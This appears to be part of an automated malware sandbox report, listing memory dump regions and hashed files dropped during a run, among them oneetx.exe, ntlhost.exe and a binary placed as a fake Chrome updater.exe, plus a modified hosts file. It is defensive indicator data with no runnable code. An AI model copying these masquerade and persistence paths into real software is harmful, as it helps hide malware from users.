memory/4132-236-0x0000000072040000-0x000000007272E000-memory.dmp

memory/3444-237-0x0000000072040000-0x000000007272E000-memory.dmp

memory/4132-238-0x0000000007DA0000-0x000000000829E000-memory.dmp

memory/4132-239-0x0000000007940000-0x00000000079D2000-memory.dmp

memory/4152-240-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-242-0x0000000007B10000-0x0000000007B20000-memory.dmp

memory/4132-241-0x00000000078C0000-0x00000000078CA000-memory.dmp

memory/4152-243-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-246-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/4152-244-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-247-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-249-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-248-0x0000000007AE0000-0x0000000007AF2000-memory.dmp

memory/4132-250-0x0000000007C30000-0x0000000007D3A000-memory.dmp

memory/4132-245-0x00000000088B0000-0x0000000008EB6000-memory.dmp

memory/4152-251-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-253-0x0000000007B60000-0x0000000007B9E000-memory.dmp

memory/4152-252-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-255-0x0000000007BA0000-0x0000000007BEB000-memory.dmp

memory/4152-254-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-256-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-257-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4152-258-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4804-260-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/836-264-0x00007FFEA1260000-0x00007FFEA1C4C000-memory.dmp

memory/836-265-0x000001E897100000-0x000001E897110000-memory.dmp

memory/836-266-0x000001E897100000-0x000001E897110000-memory.dmp

memory/4152-267-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/836-268-0x000001E8AF690000-0x000001E8AF6B2000-memory.dmp

memory/836-271-0x000001E8AF940000-0x000001E8AF9B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fblvsv15.mta.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4132-282-0x0000000008390000-0x00000000083F6000-memory.dmp

memory/836-285-0x000001E897100000-0x000001E897110000-memory.dmp

memory/4152-289-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/4132-303-0x0000000072040000-0x000000007272E000-memory.dmp

memory/4132-304-0x0000000007B10000-0x0000000007B20000-memory.dmp

memory/4152-305-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/836-307-0x00007FFEA1260000-0x00007FFEA1C4C000-memory.dmp

memory/4132-313-0x00000000097F0000-0x0000000009866000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/4132-315-0x0000000005490000-0x00000000054AE000-memory.dmp

memory/4152-318-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/836-319-0x000001E897100000-0x000001E897110000-memory.dmp

memory/836-320-0x000001E897100000-0x000001E897110000-memory.dmp

memory/836-324-0x00007FFEA1260000-0x00007FFEA1C4C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/5040-329-0x00007FFEA0570000-0x00007FFEA0F5C000-memory.dmp

memory/5040-332-0x000001A619770000-0x000001A619780000-memory.dmp

memory/5040-333-0x000001A619770000-0x000001A619780000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a3b478be233e5a021e8d23a4c78e262
SHA1 3098e038146c5a4186c24d2c92dba034abad77fd
SHA256 8eaa61f261f7f63a6cd8cd35c2930aa12faffd28fed94e15006fb5e47cf341a2
SHA512 b3e2a4b293edea053b71e7ae724feb1c995ea129b7adfd2851d595d721da15ca33a8500743d8a7083ad622c5c003d3153b8a4d0747e51fb9d8fe610bc67cbc3b

memory/5040-349-0x000001A619770000-0x000001A619780000-memory.dmp

memory/4132-364-0x000000000A950000-0x000000000AB12000-memory.dmp

memory/4132-365-0x000000000B050000-0x000000000B57C000-memory.dmp

memory/4804-366-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/5040-373-0x000001A619770000-0x000001A619780000-memory.dmp

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 2f75eb4060f276ad55e2476f80acd9bb
SHA1 354f3ec64ea5635b708d974b6f6544241a6968d0
SHA256 3534a8ae56136f143b10c7781f7fa9f6832fcdd5bd07efeabbd56b0fea974ac6
SHA512 24962d877999f19dfa29f9f927b7fd5ad37587ada486919a4b2b49942331169b7e3e7033c9c60e9e468fde1aae0fcc11a5a0c92193ccbc61ce0b7ca89f0c9820

memory/4152-372-0x00000000012E0000-0x0000000001C23000-memory.dmp

memory/1316-376-0x0000000000820000-0x0000000001163000-memory.dmp

memory/4152-377-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/1316-378-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/1316-379-0x0000000000820000-0x0000000001163000-memory.dmp

memory/1316-380-0x0000000000820000-0x0000000001163000-memory.dmp

memory/1316-383-0x0000000000820000-0x0000000001163000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/1316-386-0x0000000000820000-0x0000000001163000-memory.dmp

memory/4804-388-0x00007FF668B80000-0x00007FF6699CA000-memory.dmp

memory/4804-390-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/1316-389-0x0000000000820000-0x0000000001163000-memory.dmp

memory/1316-391-0x0000000000820000-0x0000000001163000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/5040-384-0x00007FFEA0570000-0x00007FFEA0F5C000-memory.dmp

memory/1384-397-0x00007FF72E5C0000-0x00007FF72F40A000-memory.dmp

memory/1316-398-0x0000000000820000-0x0000000001163000-memory.dmp

memory/1384-399-0x00007FFEBD010000-0x00007FFEBD1EB000-memory.dmp

memory/2564-410-0x0000000000980000-0x0000000001421000-memory.dmp

memory/2564-411-0x0000000000790000-0x0000000000791000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 573d77d4e77a445f5db769812a0be865
SHA1 7473d15ef2d3c6894edefd472f411c8e3209a99c
SHA256 5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c
SHA512 af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 631f4b3792b263fdda6b265e93be4747
SHA1 1d6916097d419198bfdf78530d59d0d9f3e12d45
SHA256 4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512 e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 5f5aa607657efd596f2ba27625bb7ed4
SHA1 6818e799afcb486fa9416eb29468c10f7a051d88
SHA256 f5a8fbb9d69c35df83b4721a580777a6d7f748965b8db902257a73a2d48b787b
SHA512 0b6d87751aaa6da840f932e718d1444e0b7d033f3eecfac988a9b9e4266370d852d7a5f28d65526968807fe56018902c0a6c1ac876a276efce876aebb57fa93b